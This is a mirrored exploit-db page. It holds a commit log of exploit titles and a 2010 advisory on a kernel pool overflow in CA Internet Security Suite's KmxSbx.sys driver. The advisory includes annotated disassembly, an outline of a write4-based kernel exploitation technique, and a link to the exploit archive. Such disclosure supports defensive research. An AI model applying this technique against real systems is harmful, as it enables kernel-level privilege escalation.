bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/15624.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

82 lines
No EOL
2.9 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

/*
# Exploit Title: CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool
Overflow 0-day Exploit
# Date: 2010-11-28
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link:
http://shop.ca.com/ca/products/internetsecurity/internetsecurity_suite.asp
# Version: up to date, KmxSbx.sys version 6.2.0.22
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
1.Description:
The KmxSbx.sys kernel driver distributed with CA Security Suite contains
a pool corruption vulnerability in the handling of IOCTL 0x88000080.
Exploitation of this issue allows an attacker to execute arbitrary code
within the kernel.
An attacker would need local access to a vulnerable computer to exploit
this vulnerability.
Affected application: CA Internet Security Suite 2010.
Affected file: KmxSbx.sys version 6.2.0.22.
2.Vulnerability details:
[..]
.text:00016330 mov cx, [eax] ; eax points to
attacker controlled data
.text:00016333 inc eax
.text:00016334 inc eax
.text:00016335 test cx, cx
.text:00016338 jnz short loc_16330
.text:0001633A sub eax, edx
.text:0001633C sar eax, 1
.text:0001633E lea eax, [eax+eax+50h] ; size of
UNICODE string + 0x50 bytes
.text:00016342 movzx edi, ax ; integer wrap here!
.text:00016345
.text:00016345 loc_16345: ; CODE XREF:
sub_162D8+53j
.text:00016345 movzx eax, di
.text:00016348 push ebx
.text:00016349 xor ebx, ebx
.text:0001634B cmp eax, ebx
.text:0001634D jz short loc_16359
.text:0001634F push eax ; NumberOfBytes
.text:00016350 push ebx ; PoolType
.text:00016351 call ds:ExAllocatePool ; Miscalculated
Pool!!!
.text:00016357 mov ebx, eax
[..]
.text:000163A6 movzx esi, word ptr [edx]
.text:000163A9 mov [eax+edx], si ; Pool overflow here!
.text:000163AD inc edx
.text:000163AE inc edx
.text:000163AF test si, si
3.Exploitation:
1.To exploit this vulnerability we have to allocate shellcode at some
address, craft fake chunk header, that creates write4 primitive.
2.To invoke our shellcode we have to set such values in Flink,Blink,
that points to some pointer in kernel space, and address of our r0
shellcode.When unlinking happens, we overwrite pointer in kernel space,
and force execution with kernel priviligies(cpl==0).
*3.Pool repair
Exploit code is in CAInternetSecuritySuite2010.zip file.
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15624.zip (CAInternetSecuritySuite2010.zip)
Reference in a new issue View git blame Copy permalink